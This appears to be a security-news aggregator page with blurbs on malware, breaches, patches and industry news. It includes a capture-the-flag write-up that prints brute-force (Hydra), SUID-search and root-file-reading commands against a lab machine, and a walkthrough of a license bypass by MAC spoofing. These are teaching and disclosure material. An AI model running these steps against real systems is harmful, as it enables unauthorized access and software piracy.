Security News

There’s been a notable shift in the types of threats targeting software developers, with a total of 17,954 open source malware packages identified in Q1 2025, according to Sonatype. Quarterly breakdown (Source: Sonatype) The Q1 figure represents a significant decrease from the more than 34,000 malicious packages discovered last quarter, largely due to a sharp drop in security holdings packages. However, compared to the same period last year, the overall malware count more than doubled. … More → The post Open-source malware doubles, data exfiltration attacks dominate appeared first on Help Net Security.

by Help Net Security

Zero to Engineer is a practical guide for anyone looking to launch a career in information technology without a traditional college degree. The book draws from the author’s unlikely journey – from being expelled from high school to earning six figures in the tech industry. About the author Terry Kim brings more than two decades of experience in the IT industry, with a career that includes roles at major technology companies such as Cisco Systems … More → The post Review: Zero to Engineer appeared first on Help Net Security.

by Help Net Security

Accidentally deleted some photos from your iPhone? You’re definitely not alone; most iPhone users have done it at…

by Hackread

The Growing Threat of Digital Identity Theft Identity theft is a continuous online threat that lurks behind every…

by Hackread

By using fake references and building connections with recruiters, some North Korean nationals are landing six-figure jobs that replenish DPRK coffers.

by Dark Reading

FIN7 cybercrime group has been linked to Anubis, a Python-based backdoor that provides remote access to compromised Windows systems. The threat actor FIN7, also known as Savage Ladybug, has developed a new Python-based malware, named Anubis Backdoor, which allows attackers to gain full remote control over infected Windows systems. It executes shell commands and system […]

by Security Affairs

While the House Committee on Government Reform was looking for retaliatory options, cybersecurity experts pointed them toward building better defenses.

by Dark Reading

The Lower Sioux Indian Community warned residents on Wednesday that a cyberattack caused disruptions for the local healthcare facility, government center and casino.

by The Record

Dark web child abuse hub ‘Kidflix’ dismantled in global operation. 1.8M users, 91,000+ CSAM videos exposed. 79 arrests, 39 children rescued.

by Hackread

Smarter TV operating systems bring new privacy risks, with one major concern being automatic content recognition (ACR) - a feature that monitors your viewing habits.

by ZDNET Security

In today’s digital workspace, SaaS applications like Slack, Google Drive, and Microsoft Teams have become the backbone of business communication and collaboration.

by Mitiga

Cybersecurity researchers have disclosed details of a now-patched privilege escalation vulnerability in Google Cloud Platform (GCP) Cloud Run that could have allowed a malicious actor to access container images and even inject malicious code. ""The vulnerability could have allowed such an identity to abuse its Google Cloud Run revision edit permissions in order to pull private Google Artifact

by The Hacker News

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is sounding the alarm over a series of high-risk vulnerabilities present in industrial control systems

by SC Media

The record-setting $40 billion funding round is indicative of just how much cash is flooding into AI — leading startups to chase all the wrong priorities.

by ITPro Today

A recent alert from CISA builds on previous research about a vulnerability in Ivanti products that China-linked hackers have used to insert malware into networks.

by The Record

Hacker leaks 144GB of sensitive Royal Mail Group data, including customer info and internal files, claiming access came via supplier Spectos. Investigation underway!

by Hackread

This post first appeared on blog.netwrix.com and was written by Dirk Schrader.Introduction: The Rise of AI Assistants in the Workplace Bob Dylan’s classic song The Times They Are a-Changin’ feels more relevant than ever as AI continues to transform our daily lives. Today, countless computer users rely on AI assistants to boost productivity and streamline their workflows. In many ways, these tools act as copilots, offering support and … Continued

by Netwrix

After a 2021 data breach affected 76 million customers, settlement checks are finally on the way. Here''s what you can expect.

by ZDNET Security

Outpost24 analysts recently discovered a critical authentication bypass vulnerability in CrushFTP, identified as CVE-2025-31161. The vulnerability has a CVSSv3.1 score of CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8). We reached out to MITRE for a CVE on 13th March 2025 and were within an agreed 90-day non-disclosure period with CrushFTP. The plan was to give users plenty of time to […] The post CrushFTP auth bypass vulnerability: Disclosure mess leads to attacks  appeared first on Outpost24.

by Outpost24

A lawyer for Xiaofeng Wang and his wife says they are “safe” after FBI searches of their homes and Wang’s sudden dismissal from Indiana University, where he taught for over 20 years.

by WIRED Security News

AttackIQ has released a new assessment template that emulates the various post-compromise Tactics, Techniques, and Procedures (TTPs) associated with the sabotage-motivated Russian adversary Seashell Blizzard. The post Emulating the Sophisticated Russian Adversary Seashell Blizzard appeared first on AttackIQ.

by AttackIQ

What is the polyglot technique, and how cybercriminals employ it to hide malicious files in other formats.

by Kaspersky

Twenty bugs in GRUB2, U-boot and Barebox were found in an AI-assisted process.

by SC Media

The openSNP project, a platform for sharing genetic and phenotypic data, will shut down on April 30, 2025, and delete all user submissions over privacy concerns and the risk of misuse by authoritarian governments. [...]

by BleepingComputer

Introduction As the cybersecurity landscape evolves, service providers play an increasingly vital role in safeguarding sensitive data and maintaining compliance with industry regulations. The National Institute of Standards and Technology (NIST) offers a comprehensive set of frameworks that provide a clear path to achieving robust cybersecurity practices. For service providers, adhering to NIST

by The Hacker News

Adaptive is pitching a security platform designed to replicate real-world attack scenarios through AI-generated deepfake simulations.  The post Serial Entrepreneurs Raise $43M to Counter AI Deepfakes, Social Engineering appeared first on SecurityWeek.

by SecurityWeek

The DragonForce ransomware group claims to be taking over the infrastructure of RansomHub, the largest ransomware group in the last year, Cyble threat intelligence researchers reported in an advisory to clients today. Cyble said the moniker behind the operators of DragonForce announced a new “project” on the RAMP forum and subsequently posted the same information on their onion-based data leak site (DLS). DragonForce said the group is launching fresh infrastructure – with two new onion links secured by CAPTCHA, similar to DragonForce''s native tor site approach – but displaying the logo of the RansomHub ransomware group. While it’s unclear if DragonForce acquired RansomHub or simply compromised it, the official RansomHub onion site has been offline since March 31, fueling speculation of a possible takeover, Cyble said. DragonForce and RansomHub: New Relationship Unclear DragonForce’s post on RAMP read: “Hi. Don’t worry RansomHub will be up soon, they just decided to move to our infrastructure! We are Reliable partners. “A good example of how “projects” work, a new option from the DragonForce Ransomware Cartel!” A postscript read (image below): “RansomHub hope you are doing well, consider our offer! We are waiting for everyone in our ranks” DragonForce made a similar claim on the group’s Tor-based Data Leak Site (DLS) - and previewed a new onion site bearing the RansomHub logo (image below). [caption id=""attachment_101814"" align=""aligncenter"" width=""927""] Preview of new onion site posted by DragonForce on RAMP forum and bearing the RansomHub Logo[/caption] DragonForce Ransomware Emerges As a Significant Player While it is unclear what the nature of the new arrangement is between the two groups, the announcement follows a March 18 announcement by DragonForce of a major expansion of its ransomware-as-a-service (RaaS) operation, Cyble said. The group introduced a franchise-like model allowing affiliates to launch their own ransomware brands under the DragonForce Ransomware Cartel. Affiliates receive full backend support, including admin/client panels, data hosting, and 24/7 infrastructure with anti-DDoS protection, providing autonomy while maintaining centralized control. DragonForce also rolled out technical upgrades across its ransomware lockers for ESXi, NAS, BSD, and Windows systems. Enhancements include encryption status tracking, detached execution, persistent UI messaging, and improved recovery mechanisms. The encryption engine was further hardened with two-pass header protection and BearSSL AES-CTR implementation using external entropy sources, “signaling DragonForce''s ambition to scale its operations with a more professionalized and affiliate-friendly infrastructure,” Cyble said. RansomHub Future Uncertain While it’s not clear what happened between the two ransomware groups, RansomHub put together an impressive run, besting all competitors since February 2024 (image below). [caption id=""attachment_101810"" align=""aligncenter"" width=""1200""] Most victims claimed by ransomware groups Feb. 2024-March 2025[/caption] RansomHub’s staying power at the top has been driven by multiple factors, in Cyble’s analysis, including perceptions of greater transparency than predecessor groups, predictable payouts, and well-packaged attack playbooks for affiliates. It remains to be seen what form RansomHub and DragonForce will take on next. We will continue to follow this breaking story and update it as new information becomes available.

by The Cyber Express

Cybersecurity researchers have shed light on an ""auto-propagating"" cryptocurrency mining botnet called Outlaw (aka Dota) that''s known for targeting SSH servers with weak credentials. ""Outlaw is a Linux malware that relies on SSH brute-force attacks, cryptocurrency mining, and worm-like propagation to infect and maintain control over systems,"" Elastic Security Labs said in a new analysis

by The Hacker News

In a global law enforcement operation led by Germany and supported by Europol, ‘Kidflix,'' one of the world''s largest online child sexual exploitation platforms, has been taken offline. The three-year investigation, culminating in March 2025, resulted in 79 arrests, the identification of nearly 1,400 suspects worldwide, and the seizure of over 3,000 electronic devices. The … The post Europol Dismantles Child Abuse Platform ‘KidFlix,’ Identifies 1,400 Suspects appeared first on CyberInsider.

by Cyber Insider

Vulnerabilities in open source ChatGPT alternative Jan AI expose systems to remote, unauthenticated manipulation. The post Vulnerabilities Expose Jan AI Systems to Remote Manipulation appeared first on SecurityWeek.

by SecurityWeek

An interactive guide for building your very own ethical hacking home lab using VMwareContinue reading on InfoSec Write-ups »

by InfoSec Write-ups

Jack of All Trades: Securi-Tay 2020 — Write-UpJack of All TradesRoom Link: https://tryhackme.com/room/jackofalltradesMission: Pwn the Box, Capture the FlagsEver had a website refuse to open because it’s running on a port it shouldn’t be? Today, we’re diving into the Securi-Tay 2020 TryHackMe boot-to-root challenge. Buckle up, because this one’s a rollercoaster of unconventional port placements, steganography, OSINT sleuthing, and classic privilege escalation!🕵️‍♂️ Nmap ShenanigansWe start our adventure with an Nmap scan, and oh boy, what a mess:Apache Server running on port 22 (Excuse me, wait, what? That’s SSH territory!)SSH running on port 80 — Who hurt you, admin? (HTTP’s usual playground)Clearly, this box is playing mind games with us. But fear not! Let’s navigate through this organized chaos.🚧 Firefox Says NOPE!Trying to open the website? Nope. Firefox slams the door in our face. Turns out, it doesn’t like serving websites on port 22 (probably because, you know, SSH exists there?).Circumventing This Madness:1️⃣ Tell Firefox to Chill - bypassing via Firefox Settings:Open a new tab and type: about:configSearch for network.security.ports.banned.overrideAdd 22 as a string and save.(Remember to remove this later, unless you enjoy security nightmares)2️⃣ Use cURL like a true hacker:curl -v http://10.10.144.31:22cURLDecoding the Breadcrumbs:I also found some base64-encoded text which, after decoding, revealed:The website was plastered with mentions of someone named “Jack” — subtle as a sledgehammer. Nice! Time to log in and claim our prize! Or so I thought… DENIED. Classic CTF bait and switch!DENIED🧐 Source Code Digging — The Hidden SecretI took a peek into recovery.php (aka the login page) and found another encoded string. This time, it’s Base32.Decode sequence:echo "<text>" | base32 -d | xxd -r -pIt spat out something resembling a shortened URL. Bit.ly? but it was encrypted somehow. Time for some OSINT!Remembering a hint about “Johny Graves” and “Crypto Job Hunting,” Alright, OSINT time! After some detective work, I found a MySpace profile (yes, MySpace, the land of the forgotten). The owner, Johny Graves, was bragging about his ROT13 encryption skills. Oh, Johny, you absolute genius.OSINTUsing CyberChef, I decrypted the URL.It led me to a Wikipedia page about Stegosauria… 🦕 Suspicious? You bet!🖼️ Steganography — Dino Picture Lies to Us!The hint screamed steganography, but my first guess — the dino image — was WRONG. Instead, the header image contained CMS credentials:uname: j_____passwd: T_____Logged in, and BAM! A PHP-based command execution page awaits.💥 PHP Command Injection — Say Hello to Reverse Shell!This screamed PHP command injection vulnerability — the application was likely using exec() to evaluate commands passed to a "cmd" parameter. Time for a reverse shell!Moving Up the Privilege ChainI discovered a password list in the home directory — perfect for SSH brute-forcing:🔓 Privilege Escalation — Jack’s Password ListFound a password list in Jack’s home directory. Hydra to the rescue!hydra -l jack -P passwd_list -s 80 ssh://10.10.144.31 -vvBoom! Found valid SSH creds:uname: j___passwd: I____Logged in via SSH, and finally got the user flag. But wait, the flag was hidden inside an image file?! Oh, come on!With a bit of finagling to transfer the file to my machine, I extracted the user flag🏆 Root Privileges — Time to Finish This!Jack wasn’t in sudoers, so we needed another way. A quick SUID bit check led us to an interesting binary:find / -type f -perm -4000 2>/dev/nullFound strings with SUID bit set. Oh no, not the classic mistake! This meant I could read any file on the system with root privileges, including the root flag file.strings /root/root.txtAnd just like that… ROOTED! 🎉🚩 Flags Secured!User Flag: securi{}Root Flag: securi{}💡 Lessons Learned1️⃣ Ports are weird. Don''t trust them. 2️⃣ Browsers hate unconventional ports. 3️⃣ Check the source code - always. 4️⃣ OSINT can lead you to MySpace (yep, it''s still alive). 5️⃣ Steganography is sneaky. 6️⃣ SUID binaries = potential root access.🎉 Final ThoughtsThis challenge was an absolute blast. From unconventional ports to OSINT, steganography, and privilege escalation, it had everything, how they string together multiple techniques in a logical progression, testing not just individual skills but also your ability to connect the dots.Until next time, stay curious, stay hacking! 🔥Jack of All Trades: Securi-Tay 2020 — Write-Up was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

Hello, my digital adventurers! In this article, I’ll show you the process of downloading and configuring your own Shuffle SOAR to automate…Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

📌Free Article LinkContinue reading on InfoSec Write-ups »

by InfoSec Write-ups

NOTEPAD ONLINEContinue reading on InfoSec Write-ups »

by InfoSec Write-ups

Author: Viraj MotaApplication Type: Commercial Thick Client (Desktop)Severity: HighBusiness Impact: Critical🚨 SummaryA critical security flaw was discovered in a commercial desktop application that allowed a user to bypass the license key validation mechanism. This vulnerability enabled attackers to extract and reuse license keys on unauthorized machines by spoofing hardware identifiers.This blog outlines a technical step-by-step walkthrough of the exploit chain, how it works, and how to mitigate such vulnerabilities in commercial software.🔍 What Was the Vulnerability?The application used a host-based license validation mechanism, where each license key was tied to a unique hardware identifier (MAC address).However, attackers could:Extract the license key from process memory,Identify the correct MAC address due to detailed error messages,Spoof the MAC address, andReuse the license key on a different machine.💥 This completely breaks the licensing model.🧺s Exploitation StepsLet’s call:Machine A — the attacker’s systemMachine B — the licensed system (victim)Step 1: Extracting the License Key from MemoryUsing memory analysis tools like Process Hacker, the attacker inspects a running process (javaw.exe) and filters memory strings to locate sensitive data.✅ Result: The license key appears in plaintext in memory.This suggests a lack of in-memory encryption or obfuscation — a common mistake in thick client apps.Step 2: Attempt to Use Key on Unauthorized SystemThe attacker tries to activate the application on Machine A using the license key from Machine B.The activation fails — but the error message leaks the expected MAC address, saying something like:Error revealing sensitive data.Licensed Host ID was not found on this machine [MAC ID REDACTED]🔍 This reveals exactly what system detail to spoof.Step 3: Spoofing the Victim’s MAC AddressThe attacker changes the MAC address of their network adapter to match the one expected by the license.On Windows:Go to Device Manager → Network Adapter → Advanced → Locally Administered AddressInsert the [Victim MAC ID — REDACTED] from the error messageDisable other adaptersRestart the system✅ Now, Machine A is impersonating Machine B from a licensing perspective.Step 4: Successful License ReuseWith the spoofed MAC address in place, the attacker successfully activates the software using the stolen license key.Successful License Reuse💨 Impact: This works for both trial and paid licenses, exposing the software to piracy, license abuse, and lost .Note: More i can do like automation to identify valid license key to increase the impact but due to security and legal terms and conditions wont able go further.🔎 Root Causes❌ License key stored unencrypted in memory❌ Verbose error messages leaking system information❌ Binding based on spoofable hardware identifiers❌ No telemetry or anti-tamper checks in place🛡️ Recommendations for Developers1. Secure In-Memory DataUse encryption or tokenization for sensitive keysAvoid storing plain text keys during runtime2. Avoid Verbose Error MessagesNever reveal host-specific identifiers (like MAC, HWID, etc.)Use generic errors like: License validation failed3. Bind to Strong IdentifiersUse TPM, motherboard UUID, or hardware-based tokensCombine multiple properties for a robust fingerprint4. Revoke and ReissueAllow admin panel to revoke compromised license keysRevalidate licenses on major environment changes5. Audit and MonitorTrack activations by IP, region, and system fingerprintAlert on anomalies (e.g., same key used across many devices)🧐 Lessons LearnedThis vulnerability demonstrates how multiple low-risk issues — like information disclosure, poor encryption, and system spoofing — can chain together into a critical exploit.✅ The FixThis issue was patched in version X.X.X, where:License validation logic was hardenedMAC spoofing was made ineffectiveError messages were cleaned upTelemetry features were introduced📢 Responsible DisclosureThis vulnerability was responsibly reported and documented by Viraj Mota. We encourage all researchers to practice coordinated disclosure, allowing vendors to patch before public release.UPDATE:Introducing a dedicated Udemy Thick Client Pentest study course: [ Practical ]— MORE THAN JUST A BLOG —https://www.udemy.com/course/thick-client-pentest-modern-approaches-2024complete💬 Final ThoughtsProtecting license enforcement is both a technical and strategic challenge. It’s not just about revenue — it’s about trust and fairness.If you’re developing a commercial product, treat license validation like any other security system: test it, break it, and fix it before someone else does.🔐 Bypassing License Validation in a Desktop Application — A Deep Dive into a Real-World Exploit was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

Once a relic of the past, Linear Tape-Open (LTO) tape storage was often seen as the dusty corner of enterprise IT — a backup solution…Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

This article is based on privilege escalation. In this article I’LL give you a technique that helps to gain root access on the machine. OR…Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

A vulnerability in Verizon''s Call Filter feature allowed customers to access the incoming call logs for another Verizon Wireless number through an unsecured API request. [...]

by BleepingComputer

A critical vulnerability in the Verizon Call Filter app for iOS exposed incoming call records of potentially all Verizon Wireless customers, allowing unauthorized access to sensitive metadata without authentication or device compromise. The flaw was discovered by independent security researcher Evan Connelly on February 22, 2025, and responsibly disclosed to Verizon the same day. The … The post Verizon Call Filter App Flaw Exposed Call Logs of Millions of Customers appeared first on CyberInsider.

by Cyber Insider

When assessing an organization’s external attack surface, encryption-related issues (especially SSL misconfigurations) receive special attention. Why? Their widespread use, configuration complexity, and visibility to attackers as well as users make them more likely to be exploited.  This highlights how important your SSL configurations are in maintaining your web application security and

by The Hacker News

This blog highlights how vulnerability data, collected using Cado''s new vulnerability discovery feature, can be fused with threat data to help deepen the understanding of an attack, as well as guide remediation efforts.

by Darktrace

Cyberhaven bags $100 million in funding at a billion-dollar valuation, a sign that investors remain bullish on data security startups. The post Cyberhaven Banks $100 Million in Series D, Valuation Hits $1 Billion appeared first on SecurityWeek.

by SecurityWeek

A new security fund aims to help apps in the fediverse — like Mastodon, Threads, and Pixelfed — to pay researchers for disclosing security bugs.

by TechCrunch

A multi-year operation against the child sexual abuse material (CSAM) platform Kidflix has led to dozens of arrests and the seizure of tens of thousands of illegal videos, Europol said Wednesday.

by The Record

China-linked APT group FamousSparrow hits targets in the Americas using upgraded SparrowDoor malware in new cyberespionage campaign, ESET reports.

by Hackread

As the war between Russian and Ukraine continues, Western cyber support is waning, raising growing concerns about the long-term effectiveness of these efforts.

by The Record

Over 39 million secrets like API keys and account credentials were leaked on GitHub throughout 2024, exposing organizations and users to significant security risks. [...]

by BleepingComputer

The bad actor’s TTPs closely align to the Storm-1811 threat group identified last year by Microsoft, say Ontinue researchers.

by SC Media

A critical vulnerability (CVE-2025-1268) in Canon printer drivers allows remote code execution. See which drivers are affected, how to patch them.

by Hackread

The rise of zero-knowledge threat actors powered by AI marks a turning point in the business of cybercrime where sophisticated attacks are no longer confined to skilled attackers. The post AI Giving Rise of the ‘Zero-Knowledge’ Threat Actor appeared first on SecurityWeek.

by SecurityWeek

Microsoft has announced that hotpatch updates are now available for business customers using Windows 11 Enterprise 24H2 on x64 (AMD/Intel) systems, starting today. [...]

by BleepingComputer

You may have read some of our previous blog posts on Artificial Intelligence (AI). We discussed things like using PyRIT to help automate attacks. We also covered the dangers of […] The post Getting Started with AI Hacking: Part 1 appeared first on Black Hills Information Security, Inc..

by Black Hills Information Security

The US military and law enforcement learned to outthink insurgents. It''s time for cybersecurity to learn to outsmart and outmaneuver threat actors with the same framework.

by Dark Reading

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Apache Tomcat flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added an Apache Tomcat path equivalence vulnerability, tracked as CVE-2025-24813, to its Known Exploited Vulnerabilities (KEV) catalog. The Apache Tomcat vulnerability CVE-2025-24813 was recently disclosed and is being actively exploited just 30 […]

by Security Affairs

North Korea’s IT worker scam has expanded widely into Europe after years of focusing on U.S. companies, according to new research.

by The Record

DeepMind found that current AI frameworks are ad hoc, not systematic, and fail to provide defenders with useful insights. The post Google DeepMind Unveils Framework to Exploit AI’s Cyber Weaknesses appeared first on SecurityWeek.

by SecurityWeek

A generative AI nudify service has been found storing explicit deepfakes in an unprotected cloud database.

by Malwarebytes Labs

The Travelers Companies announced Travelers Cyber Risk Services, a suite of capabilities added to all cyber liability policies designed to help lower both the risk of a cyberattack and the cost to recover from one. In addition to always-on threat monitoring and tailored alerts, key benefits of Travelers Cyber Risk Services include: Cyber Risk Dashboard: This 24/7 tool gives consumers the ability to monitor risks and track progress over time, view customized recommendations ranked by … More → The post Travelers Cyber Risk Services reduces the risk of a cyberattack appeared first on Help Net Security.

by Help Net Security

Delaware, USA, 2nd April 2025, CyberNewsWire

by Hackread

Michael Waltz used his personal Gmail to share ""potentially exploitable"" information, per the report.

by TechCrunch

by Hack The Box Blog

The global rise of North Korean IT worker infiltration poses a serious cybersecurity risk—using fake identities, remote access, and extortion to compromise organizations. The post North Korea’s IT Operatives Are Exploiting Remote Work Globally appeared first on SecurityWeek.

by SecurityWeek

Attackers target a familiar industry, law professionals, by hiding the infostealer in ads delivered via Google-based malvertising.

by Dark Reading

In today’s digital landscape, understanding your organization’s attack surface is crucial for maintaining robust cybersecurity. To effectively manage and mitigate the cyber-risks hiding in modern attack surfaces, it’s important to adopt an attacker-centric approach. In this article, we will be diving deeper into a company’s attack surface, what might have been forgotten and overlooked during the day-to-day rush and how cybersecurity professionals can regain the momentum and overview with the help of external attack surface … More → The post How to map and manage your cyber attack surface with EASM appeared first on Help Net Security.

by Help Net Security

In this guest blog post, learn about six commonly missed AWS ''blind spots'' that could lead to risk in your cloud infrastructure. The post The Overlooked Six | AWS Security Blind Spots appeared first on SentinelOne.

by SentinelOne

It seems like only yesterday that we launched the Compliance Plus training library as a result of customers asking us to address their needs beyond security awareness training.

by KnowBe4

Being DAST-first means starting application security with validated, real-world testing that prioritizes actual exploitable risks. Invicti’s DAST-first platform leads the way towards integrating all AppSec efforts within a scalable and integrated environment that gets your teams fixing what matters most—faster and with less noise. The post Meet the future of AppSec: DAST-first application security appeared first on Invicti.

by Invicti

iOS 18.4 is here, and for some, it''s causing major battery drain. Here are my top tips to get to the root of the issue and restore your iPhone''s power ASAP.

by ZDNET Security

It’s been just over a year since open source Falco graduated from the Cloud Native Computing Foundation® (CNCF) during KubeCon... The post The state of Falco: A year of progress since CNCF graduation appeared first on Sysdig.

by Sysdig

Utimaco launched Quantum Protect, the Post Quantum Cryptography application package for its u.trust General Purpose HSM (Hardware Security Modules) Se-Series. The advent of quantum computers poses a threat to today’s cryptographic landscape. A cryptanalytically relevant quantum computer that could break common public key schemes such as RSA or ECC is expected by 2030. That may seem far away, but organizations need to plan their migration to Post Quantum Cryptography (PQC) now in order to stay … More → The post Utimaco releases Quantum Protect solution appeared first on Help Net Security.

by Help Net Security

​Royal Mail is investigating claims of a security breach after a threat actor leaked over 144GB of data allegedly stolen from the company''s systems. [...]

by BleepingComputer

A new phishing campaign is using a famous brand to compromise hotels.

by ThreatDown

A new data breach has impacted the Royal Mail Group, with 144GB of sensitive data leaked on March 31, 2025, by a hacker using the alias “GHNA.” The attack, linked to a long-dormant infostealer infection from 2021, is the second major incident involving Spectos, the same third-party service provider implicated in last week''s Samsung Tickets … The post Royal Mail Group Breach Exposes 144GB of Sensitive Customer Data appeared first on CyberInsider.

by Cyber Insider

The financially motivated threat actor known as FIN7 has been linked to a Python-based backdoor called Anubis (not to be confused with an Android banking trojan of the same name) that can grant them remote access to compromised Windows systems. ""This malware allows attackers to execute remote shell commands and other system operations, giving them full control over an infected machine,"" Swiss

by The Hacker News

Google has patched a Cloud Run vulnerability dubbed ImageRunner that could have been exploited to gain access to sensitive data. The post ImageRunner Flaw Exposed Sensitive Information in Google Cloud appeared first on SecurityWeek.

by SecurityWeek

The cloud has become the hub of modern data traffic. It offers organizations of all sizes unprecedented speed, flexibility, and... The post Sysdig and Camptocamp announce partnership for strong cloud security based on open source appeared first on Sysdig.

by Sysdig

Phishing scams are becoming brutally effective, and even technically sophisticated people can be fooled. Here''s how to limit the damage immediately and what to do next.

by ZDNET Security

Sending end-to-end encrypted (E2EE) emails from Gmail enterprise accounts is about to become much easier than it is now, Google has announced on Tuesday. The company will first make available this simplified capability to users who want to send E2EE emails to other Gmail users in their own organization, and will extend it in the coming weeks to include E2EE emails to external enterprise or personal Gmail inboxes. Finally, later this year, they will be … More → The post Google is making sending end-to-end encrypted emails easy appeared first on Help Net Security.

by Help Net Security

Apple has released a series of critical security updates to address vulnerabilities that were actively exploited as zero-day threats. These updates include backported patches for older versions of iOS, iPadOS, macOS, and watchOS, aiming to secure devices that may still be running outdated software.   A key focus of these updates is the backporting of zero-day patches to older devices, reflecting the ongoing efforts to mitigate risks across a broad range of hardware. Notable vulnerabilities include CVE-2025-24200 and CVE-2025-24201, both of which were actively exploited before patches were issued.  Backporting Zero-Day Fixes  The vulnerability CVE-2025-24200 allowed mobile forensic tools to bypass the USB Restricted Mode on locked devices, a feature designed to prevent unauthorized data access via USB ports. This flaw was addressed with the release of iOS 18.3.1, iPadOS 18.3.1, and macOS 17.7.5 on February 10, 2025, with backports provided for older versions such as iOS 16.7.11 and iPadOS 16.7.11.  Similarly, CVE-2025-24201, which affected the WebKit engine, enabled attackers to break out of the Web Content sandbox through specially crafted web content. This vulnerability was exploited in several attacks, prompting company to release fixes in iOS 18.3.2, iPadOS 18.3.2, and macOS Sequoia 15.3.2 on March 11, 2025. Older devices received updates through versions like iOS 16.7.11 and corresponding macOS releases.  Apple Addresses Other Vulnerabilities and Fixes  In addition to the zero-day flaws, Apple addressed CVE-2025-24085, a privilege escalation issue within the Core Media framework. This vulnerability was patched in the January 2025 updates for iOS 18.3, iPadOS 18.3, macOS Sequoia 15.3, and tvOS 18.3, with backports available in iPadOS 17.7.6 and macOS Sonoma 14.7.5.  The updates also cover a range of other security flaws across various system components, including Safari, CoreAudio, Maps, Calendar, and more. These patches aim to enhance the overall security posture of company’s ecosystem, addressing risks that could lead to data breaches, system crashes, or unauthorized access.  Security Content of Latest Updates  The latest update, watchOS 11.4, released on April 1, 2025, targets vulnerabilities affecting the Apple Watch Series 6 and later. Key fixes include CVE-2025-24097, which addresses a permissions issue with AirDrop, and CVE-2025-24244, a flaw in font processing that could lead to memory disclosure.  Authentication services have also been fortified, with patches for issues like CVE-2025-30430, which could allow attackers to bypass password autofill restrictions, and CVE-2025-24180, which affected WebAuthn credentials across websites with similar suffixes. Other security enhancements cover audio-related vulnerabilities, such as CVE-2025-24243, which addressed a flaw in processing malicious font files capable of triggering arbitrary code execution.  Conclusion  The release of these security updates highlights the critical role of timely patching in addressing vulnerabilities, particularly zero-day threats like CVE-2025-24200 and CVE-2025-24201. By backporting fixes to older devices, company aims to provide broader protection, though the effectiveness of such measures relies heavily on user promptness in applying updates.  

by The Cyber Express

Cybersecurity researchers have discovered an updated version of a malware loader called Hijack Loader that implements new features to evade detection and establish persistence on compromised systems. ""Hijack Loader released a new module that implements call stack spoofing to hide the origin of function calls (e.g., API and system calls),"" Zscaler ThreatLabz researcher Muhammed Irfan V A said in

by The Hacker News

Apple has appealed to the Investigatory Powers Tribunal over an order by home secretary Yvette Cooper to give the UK access to customers'' data protected by Advanced Data Protection encryption. What happens next?

by ComputerWeekly

As companies scramble to hire AI talent, experts warn that neglecting strategic workforce planning and inclusive hiring practices may lead to costly, unsustainable outcomes.

by ITPro Today

ChatGPT, the famous artificial intelligence chatbot that allows users to converse with various personalities and topics, has connectivity issues worldwide. [...]

by BleepingComputer

North Korea’s Lazarus hackers are using the ClickFix technique for malware deployment in fresh attacks targeting the cryptocurrency ecosystem. The post Lazarus Uses ClickFix Tactics in Fake Cryptocurrency Job Attacks appeared first on SecurityWeek.

by SecurityWeek

Nearly 24K unique IP addresses have attempted to access portals in the last 30 days, raising concerns of imminent attacks over the past 30 days.

by Cybersecurity Dive

By [Alon Gal] | April 2025 Just days after reporting on the Samsung Tickets data breach, another massive leak has surfaced, this time targeting Royal Mail Group, a British institution with over 500 years of history. On April 2, 2025, a threat actor known as “GHNA” posted on BreachForums, announcing the release of 144GB of data […] The post Royal Mail Group Loses 144GB to Infostealers: Same Samsung Hacker, Same 2021 Infostealer Log appeared first on InfoStealers.

by InfoStealers

DrayTek has shared some clarifications regarding the recent attacks causing router reboots, but some questions remain unanswered.  The post Questions Remain Over Attacks Causing DrayTek Router Reboots appeared first on SecurityWeek.

by SecurityWeek

Kidflix, one of the largest platforms used to host, share, and stream child sexual abuse material (CSAM) on the dark web, was shut down on March 11 following a joint action coordinated by German law enforcement. [...]

by BleepingComputer

Gmail now allows enterprise users to send end-to-end encrypted emails to colleagues, and will soon allow sending to any inbox. The post Google Brings End-to-End Encrypted Emails to All Enterprise Gmail Users appeared first on SecurityWeek.

by SecurityWeek

The dawn of our fifth year deepens our understanding of the enemies at the gate, and some tensions inside it; plus, an anniversary gift from us to you

by Sophos News

Most orgs only discover their security controls failed after a breach. With OnDefend''s continuous validation, you can test, measure, and prove your defenses work—before attackers exploit blind spots. [...]

by BleepingComputer

The TookPS malicious downloader is distributed under the guise of DeepSeek, and further mimics UltraViewer, AutoCAD, SketchUp, Ableton, and other popular tools.

by Securelist

A new version of the Triada trojan has been discovered preinstalled on thousands of new Android devices, allowing threat actors to steal data as soon as they are set up. [...]

by BleepingComputer

OpenSNP, a decade-old open science platform that allowed users to publicly share their genetic and phenotypic data, will officially shut down on April 30, 2025. All user-contributed data will be permanently deleted, marking the end of one of the most prominent grassroots efforts to democratize access to human genomics. The shutdown was announced by co-founder … The post OpenSNP to Shut Down and Delete All User-Submitted DNA Data appeared first on CyberInsider.

by Cyber Insider

Generative AI scraper bots are gray bots designed to extract or scrape large volumes of data from websites, often to train generative AI models. In this report we look at what the data tells us about Gen AI gray bot activity facing organizations today.

by Barracuda

Leading UK cyber security firm, Bridewell, has announced the appointment of Sam Thornton as Chief Operating Officer and welcomed him to its board of directors, a move which the company hopes will further strengthen Bridewell’s position as a globally recognised cyber security services company. Sam Thornton is a highly experienced, client-centric business leader with 20 […] The post Bridewell appoints Sam Thornton as COO to strengthen operations and accelerate growth appeared first on IT Security Guru.

by IT Security Guru

North Korean IT workers are expanding their efforts beyond the US, and are seeking to fraudulently gain employment with organizations around the world, but most especially in Europe. According to Google’s threat researchers, they are also increasingly attempting to extort money from these companies once they get discovered and/or fired. “Previously, workers terminated from their places of employment might attempt to provide references for their other personas so that they could be rehired by the … More → The post North Korean IT workers set their sights on European organizations appeared first on Help Net Security.

by Help Net Security

A malicious hacker recently offered to sell the security firm’s sensitive customer information.

by Cybersecurity Dive

The company filed for bankruptcy after financial challenges over the past few years and a massive data breach in 2023.

